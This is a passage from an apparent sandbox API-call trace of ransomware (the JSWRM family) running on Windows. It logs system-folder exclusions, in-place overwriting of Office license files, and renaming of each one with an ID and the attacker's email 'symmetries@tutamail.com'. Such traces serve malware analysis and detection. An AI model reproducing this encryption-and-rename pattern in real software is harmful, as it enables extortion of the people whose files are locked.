lpString2="system volume information") returned -1 [0104.844] lstrcmpiW (lpString1="O365HomePremR_SubTest3-pl.xrm-ms", lpString2="msocache") returned 1 [0104.844] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7a0 [0104.844] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_SubTest3-pl.xrm-ms", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0104.844] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0104.844] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_SubTest3-pl.xrm-ms", cchWideChar=32, lpMultiByteStr=0x22d0a0, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365HomePremR_SubTest3-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 32 [0104.844] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7a0 | out: hHeap=0x1e0000) returned 1 [0104.844] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7f8 [0104.844] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_SubTest3-pl.xrm-ms", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0104.844] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0104.844] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_SubTest3-pl.xrm-ms", cchWideChar=32, lpMultiByteStr=0x22cdc8, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365HomePremR_SubTest3-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 32 [0104.844] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7f8 | out: hHeap=0x1e0000) returned 1 [0104.844] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0104.844] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0104.844] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0104.844] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0104.844] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236970 [0104.844] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_SubTest3-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subtest3-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0104.844] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11179) returned 1 [0104.844] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.845] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2ba0) returned 0x24c1d0 [0104.845] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2ba0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2ba0, lpOverlapped=0x0) returned 1 [0104.847] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.847] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2ba0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2ba0, lpOverlapped=0x0) returned 1 [0104.847] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0104.847] CloseHandle (hObject=0x45c) returned 1 [0104.847] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236188 [0104.847] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0104.847] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0104.848] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0104.848] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0104.848] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0104.848] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0104.848] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a480 [0104.848] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a480, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0104.848] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a480 | out: hHeap=0x1e0000) returned 1 [0104.848] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236520 [0104.848] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e688 [0104.848] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236520 | out: hHeap=0x1e0000) returned 1 [0104.848] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0104.848] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_SubTest3-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subtest3-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_SubTest3-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subtest3-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0104.849] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e688 | out: hHeap=0x1e0000) returned 1 [0104.849] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236188 | out: hHeap=0x1e0000) returned 1 [0104.849] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236970 | out: hHeap=0x1e0000) returned 1 [0104.849] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0104.849] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0104.849] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe5fc05cc, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe5fc05cc, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe607f17a, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5a5e, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="O365HomePremR_SubTest3-ppd.xrm-ms", cAlternateFileName="O3BFD7~1.XRM")) returned 1 [0104.849] lstrcmpiW (lpString1="O365HomePremR_SubTest3-ppd.xrm-ms", lpString2=".") returned 1 [0104.849] lstrcmpiW (lpString1="O365HomePremR_SubTest3-ppd.xrm-ms", lpString2="..") returned 1 [0104.849] lstrcmpiW (lpString1="O365HomePremR_SubTest3-ppd.xrm-ms", lpString2="...") returned 1 [0104.849] lstrcmpiW (lpString1="O365HomePremR_SubTest3-ppd.xrm-ms", lpString2="windows") returned -1 [0104.849] lstrcmpiW (lpString1="O365HomePremR_SubTest3-ppd.xrm-ms", lpString2="recovery") returned -1 [0104.849] lstrcmpiW (lpString1="O365HomePremR_SubTest3-ppd.xrm-ms", lpString2="perflogs") returned -1 [0104.849] lstrcmpiW (lpString1="O365HomePremR_SubTest3-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0104.849] lstrcmpiW (lpString1="O365HomePremR_SubTest3-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0104.849] lstrcmpiW (lpString1="O365HomePremR_SubTest3-ppd.xrm-ms", lpString2="system volume information") returned -1 [0104.849] lstrcmpiW (lpString1="O365HomePremR_SubTest3-ppd.xrm-ms", lpString2="msocache") returned 1 [0104.849] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0104.849] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_SubTest3-ppd.xrm-ms", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0104.849] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0104.849] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_SubTest3-ppd.xrm-ms", cchWideChar=33, lpMultiByteStr=0x22d260, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365HomePremR_SubTest3-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 33 [0104.849] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0104.849] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0104.849] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_SubTest3-ppd.xrm-ms", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0104.849] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0104.849] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_SubTest3-ppd.xrm-ms", cchWideChar=33, lpMultiByteStr=0x22cdc8, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365HomePremR_SubTest3-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 33 [0104.849] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0104.849] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0104.849] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0104.849] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0104.850] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0104.850] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236240 [0104.850] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_SubTest3-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subtest3-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0104.850] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=23134) returned 1 [0104.850] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.850] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5a50) returned 0x24c1d0 [0104.850] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x5a50, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x5a50, lpOverlapped=0x0) returned 1 [0104.853] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.853] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x5a50, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x5a50, lpOverlapped=0x0) returned 1 [0104.853] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0104.853] CloseHandle (hObject=0x45c) returned 1 [0104.853] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236ae0 [0104.853] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0104.853] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0104.853] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0104.853] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0104.853] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0104.853] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0104.853] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0104.853] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0104.853] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0104.853] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b380 [0104.853] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f3a8 [0104.854] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b380 | out: hHeap=0x1e0000) returned 1 [0104.854] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0104.854] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_SubTest3-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subtest3-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_SubTest3-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subtest3-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0104.855] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f3a8 | out: hHeap=0x1e0000) returned 1 [0104.855] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236ae0 | out: hHeap=0x1e0000) returned 1 [0104.855] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236240 | out: hHeap=0x1e0000) returned 1 [0104.855] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0104.855] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0104.855] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe60f1896, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe60f1896, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe61d6728, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d6e, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="O365HomePremR_SubTest3-ul-oob.xrm-ms", cAlternateFileName="O3E990~1.XRM")) returned 1 [0104.855] lstrcmpiW (lpString1="O365HomePremR_SubTest3-ul-oob.xrm-ms", lpString2=".") returned 1 [0104.855] lstrcmpiW (lpString1="O365HomePremR_SubTest3-ul-oob.xrm-ms", lpString2="..") returned 1 [0104.855] lstrcmpiW (lpString1="O365HomePremR_SubTest3-ul-oob.xrm-ms", lpString2="...") returned 1 [0104.855] lstrcmpiW (lpString1="O365HomePremR_SubTest3-ul-oob.xrm-ms", lpString2="windows") returned -1 [0104.855] lstrcmpiW (lpString1="O365HomePremR_SubTest3-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0104.855] lstrcmpiW (lpString1="O365HomePremR_SubTest3-ul-oob.xrm-ms", lpString2="perflogs") returned -1 [0104.855] lstrcmpiW (lpString1="O365HomePremR_SubTest3-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0104.855] lstrcmpiW (lpString1="O365HomePremR_SubTest3-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0104.855] lstrcmpiW (lpString1="O365HomePremR_SubTest3-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0104.855] lstrcmpiW (lpString1="O365HomePremR_SubTest3-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0104.855] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bf60 [0104.855] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_SubTest3-ul-oob.xrm-ms", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0104.855] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0104.855] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_SubTest3-ul-oob.xrm-ms", cchWideChar=36, lpMultiByteStr=0x22d260, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365HomePremR_SubTest3-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 36 [0104.855] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bf60 | out: hHeap=0x1e0000) returned 1 [0104.855] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bd50 [0104.855] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_SubTest3-ul-oob.xrm-ms", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0104.855] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0104.855] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_SubTest3-ul-oob.xrm-ms", cchWideChar=36, lpMultiByteStr=0x22cdc8, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365HomePremR_SubTest3-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 36 [0104.855] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bd50 | out: hHeap=0x1e0000) returned 1 [0104.855] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2362f8 [0104.855] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0104.855] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0104.856] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0104.856] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0104.856] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_SubTest3-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subtest3-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0104.856] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11630) returned 1 [0104.856] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.856] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d60) returned 0x24c1d0 [0104.856] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d60, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d60, lpOverlapped=0x0) returned 1 [0104.858] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.859] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d60, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d60, lpOverlapped=0x0) returned 1 [0104.859] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0104.859] CloseHandle (hObject=0x45c) returned 1 [0104.859] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236800 [0104.859] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0104.859] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0104.859] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0104.859] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0104.859] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0104.859] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0104.859] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a420 [0104.859] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a420, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0104.859] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a420 | out: hHeap=0x1e0000) returned 1 [0104.859] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24be70 [0104.859] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f5f8 [0104.859] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24be70 | out: hHeap=0x1e0000) returned 1 [0104.859] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0104.859] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_SubTest3-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subtest3-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_SubTest3-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subtest3-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0104.860] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f5f8 | out: hHeap=0x1e0000) returned 1 [0104.860] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236800 | out: hHeap=0x1e0000) returned 1 [0104.860] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0104.860] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0104.860] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0104.860] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe5e1cbb7, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe5e1cbb7, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe600ca61, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2bab, 